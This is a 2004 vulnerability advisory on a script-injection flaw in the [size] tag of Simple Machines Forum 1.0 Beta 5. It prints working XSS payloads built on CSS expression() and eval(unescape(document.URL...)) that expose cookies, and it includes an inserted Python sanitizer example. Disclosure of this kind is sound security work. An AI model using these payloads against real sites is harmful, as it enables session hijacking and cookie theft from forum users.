
smfsize.txt

Posted May 7, 2004
Authored by Cheng Peng Su

SMF version 1.0 Beta 5 public is susceptible to a script injection vulnerability. This company used to produce YaBB SE.

tags | advisory
SHA-256 | e736457eeb8aafb46103798872b48e1a7e58d0fe8c0825054e41c0e3017ab7a0

############################################################################

Advisory Name : SMF SIZE Tag Script Injection Vulnerability
Release Date : May 3, 2004
Application : Simple Machines
Tested On : SMF 1.0 Beta 5 Public
Vendor URL : http://www.simplemachines.org/
Discoverer : Cheng Peng Su (apple_soup_at_msn.com)

############################################################################

Intro:
The team that brought you YaBB SE has moved on to develop the next
evolution in forum software, Simple Machines Forum (SMF). They have
rebranded themselves under the name Simple Machines. They proudly
state that "SMF is a next-generation community software package and
is jam-packed with features, while at the same time having a minimal
impact on resources."

Proof of concept:
SMF does not strictly filter scripting code inside [size] tags; in
other words, it fails to filter the ( ) + characters. An attacker can
therefore use the expression() syntax to place a malicious expression
in the font-size attribute. The code below works:

[size=expression(alert(document.cookie))]Just beginning[/size]

But if you try more complex code, you will find that some characters
(such as the quote, apostrophe and semicolon) are filtered by SMF.
However, I found a working way that needs no quote, apostrophe or
semicolon; you will see this way in the Exploit below.

Exploit:
First, submit specially crafted content like the following:

[size=expression(eval(unescape(document.URL.substring(document.URL.
length-41,document.URL.length))))]Big Exploit[/size]

The '41' in the content is the length of the malicious script.
If the URL of the topic above is

http://site/index.php?topic=12345.0

Make a link with malicious scripting like this:

http://site/index.php?topic=12345.0&alert('Your cookie:\n'+document.
cookie)
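
The root cause above is that the [size] parameter reaches a CSS font-size attribute unfiltered, and expression() (an Internet Explorer-only dynamic CSS property) then evaluates it as script when the style is rendered. The following is an added example, not SMF's own code or a patch from the vendor: a strict allowlist for the [size] parameter that accepts only a small integer with an optional length unit, HTML-escapes the post, drops the tag on any other parameter, and reports rejected parameters so they can be logged at submit time. The regexes, function names and MAX_SIZE bound are my own assumptions.

```python
import html
import re

# Added example, not SMF's own code. Only a small integer, optionally followed
# by a CSS length unit, is accepted as the [size] parameter; anything carrying
# parentheses, "expression", quotes or semicolons cannot match this pattern.
SIZE_PARAM_RE = re.compile(r"(?P<num>[1-9][0-9]?)(?P<unit>px|pt|em)?")

# Match a complete [size=...]...[/size] element. The parameter group is kept
# permissive on purpose so a hostile parameter is still captured, then rejected.
SIZE_TAG_RE = re.compile(r"\[size=([^\]]*)\](.*?)\[/size\]", re.IGNORECASE | re.DOTALL)

MAX_SIZE = 48  # upper bound, so the tag cannot be abused for layout tricks either

def safe_size_value(param):
    """Return a CSS font-size string for an allowlisted parameter, else None."""
    m = SIZE_PARAM_RE.fullmatch(param.strip())
    if m is None:
        return None
    num = int(m.group("num"))
    if num > MAX_SIZE:
        return None
    return f"{num}{m.group('unit') or 'pt'}"

def render_size_bbcode(text):
    """Render [size] BBCode to HTML; the whole input is HTML-escaped first so the
    post itself cannot inject markup, and a rejected parameter drops the tag."""
    def repl(m):
        value = safe_size_value(m.group(1))
        inner = m.group(2)  # already escaped together with the rest of the input
        if value is None:
            return inner  # keep the text, never the attacker-controlled style
        return f'<span style="font-size: {value}">{inner}</span>'
    return SIZE_TAG_RE.sub(repl, html.escape(text))

def rejected_size_params(text):
    """List [size] parameters failing the allowlist, for logging at submit time."""
    return [p for p, _ in SIZE_TAG_RE.findall(text) if safe_size_value(p) is None]

if __name__ == "__main__":
    # Constructed sample post that reuses the advisory's first payload.
    post = "[size=14px]Hello[/size] [size=expression(alert(document.cookie))]Just beginning[/size]"
    print(render_size_bbcode(post))
    print(rejected_size_params(post))
```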

Solution:
SMF has been notified and there may be a release of a fix or update
to resolve these issues. Who knows, maybe they don't care about this bug.

Contact:
apple_soup_at_msn.com
Cheng Peng Su
Class 1, Senior 2, High School Attached to Wuhan University
Wuhan, Hubei, China (430072)
